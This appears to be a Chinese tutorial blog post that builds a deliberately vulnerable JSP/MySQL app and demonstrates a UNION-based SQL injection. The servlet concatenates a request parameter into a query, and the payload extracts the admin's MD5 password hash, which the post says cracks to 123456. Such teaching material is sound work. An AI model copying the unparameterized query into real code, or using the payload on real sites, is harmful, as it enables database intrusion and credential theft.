jsp mysql 注入攻击实例 - answerstu - answerstu.com answerstu

jsp mysql 注入攻击实例

例子 要查询信息 并显示出来

SQL  信息表与admin表 插入信息 md5 加密的密码

CREATE TABLE `admin` (  
  `Id` int(11) NOT NULL AUTO_INCREMENT,  
  `Name` varchar(40) NOT NULL,  
  `Psw` varchar(100) NOT NULL, 
  PRIMARY KEY (`Id`)
)ENGINE=InnoDB DEFAULT CHARSET=utf8;


CREATE TABLE `info` (  
  `Id` int(11) NOT NULL AUTO_INCREMENT,  
  `Info` varchar(40) NOT NULL,  
  PRIMARY KEY (`Id`)
)ENGINE=InnoDB DEFAULT CHARSET=utf8;


insert into info(`Info`) values('SQLinject');
insert into admin(`Name`,`Psw`) values('admin','E10ADC3949BA59ABBE56E057F20F883E');

开始页---点击传参 --查询信息

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>

<!DOCTYPE HTML>
<html>
  <head>
    <base href="<%=basePath%>">
    
    <title>SQL注入测试</title>
	
  </head>
  
  <body>
 
 <% String info="SQLinject"; %>
 <a href="Info?info=<%=info%>"> 查询info的信息 </a>
 
  </body>
</html>

查询servlet


package servlet;

import javax.servlet.http.HttpServlet;

import java.io.IOException;

import javax.servlet.RequestDispatcher;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import dal.infodal;
import java.sql.*;



public class info extends HttpServlet{

	
	
   String ms="";
	@Override
    protected void service(HttpServletRequest req, HttpServletResponse res)
            throws ServletException, IOException {
         
        //取得表单数据
		String info="";
         
		if(req.getParameter("info")!=""&&req.getParameter("info").length()<100)
		{ 
			info=new String(req.getParameter("info").getBytes("ISO-8859-1"),"UTF-8");
		}else{
			ms+="info不正确";       
		  }
 
		
		ResultSet rs=infodal.serchinfo(info);
		ms="信息查询成功";
		
		req.setAttribute("rs", rs);
		req.setAttribute("ms", ms);
		RequestDispatcher rd=req.getRequestDispatcher("inforesult.jsp");
		rd.forward(req,res);
	
	
	}
	
}
查询DAL


package dal;
import java.sql.*;

import constant.dbconstant;

public class infodal {
	
	
	public static ResultSet serchinfo(String info){
		
		  String driverClass=dbconstant.getDriverclass();

		  String  url=dbconstant.getUrl();

		  String dbUser = dbconstant.getDbuser();   

		  String dbPwd = dbconstant.getDbpwd(); 
		
		
		
						
					
					 
					try{   
						   
						   Class.forName(driverClass);                 
				           Connection con = DriverManager.getConnection(url,dbUser,dbPwd);
				           Statement stmt=con.createStatement();   
				           // 
				           String sql="select id,Info from info where Info='"+info+"'";
				           ResultSet rs=stmt.executeQuery(sql); 
				           				        
				        
				          return rs;
				        
					 }catch(Exception ex)
				     {   

				            System.out.print("连接失败!!<br>"+ex.toString());   
				          
                           return null;
				        } 
		 
		
	}
	
	

}

显示查询信息


<%@ page language="java" 
import="java.util.*" 
import="java.sql.*"
import="constant.dbconstant"
pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>

<!DOCTYPE HTML>
<html>
  <head>
    <base href="<%=basePath%>">
    
    <title>SQL注入测试</title>
    

  </head>
  
  <body>
 <%

 
 ResultSet rs=(ResultSet)request.getAttribute("rs");

  

while(rs.next())
{
  %>
 <p> 查询的信息为: <%=rs.getInt("Id") %> </p> <br>
 <p> 查询的信息为: <%=rs.getString("Info") %> </p> <br>
<p> 查询的信息为: <%=rs.getNString(2) %> </p> <br>
 <%}%>
 
 
  <%
String msg="";
msg=(String)request.getAttribute("ms");
if(msg==null){
msg="";
}else{
request.removeAttribute("ms");
}

%>

<%=msg %>
  
<script type="text/javascript">
window.onload=function(){
if("<%=msg%>"!="")
{

alert("<%=msg%>");
//self.location="inforesult.jsp";

}
}
					 
</script>  
 
 
  </body>
</html>

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app>
    
 <servlet>
    <servlet-name>Info</servlet-name>
    <servlet-class>servlet.info</servlet-class>
  </servlet>
   
  <servlet-mapping>
        <servlet-name>Info</servlet-name>
        <url-pattern>/Info</url-pattern>
  </servlet-mapping>
 
  
</web-app>

 以上为很常见的jsp过程   参数info 没有过滤 也没有参数化查询


注入语句

SQLinject'  union select 2,Psw from admin where Name='admin

2 为常数  因为要对齐info 个数为2 int stirng  

查询语句为

select Id,Info from Info where Info='SQLinject' union select 2,Psw from admin where Name='admin';


查询出来的信息为

info 的 Id     Info                    1       'SQLinject'

           2       Psw                   2      'E10ADC3949BA59ABBE56E057F20F883E'

E10ADC3949BA59ABBE56E057F20F883E 为md5密码  在线查询  123456



Leave a Reply

Your email address will not be published. Required fields are marked *

You can use these HTML tags and attributes <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>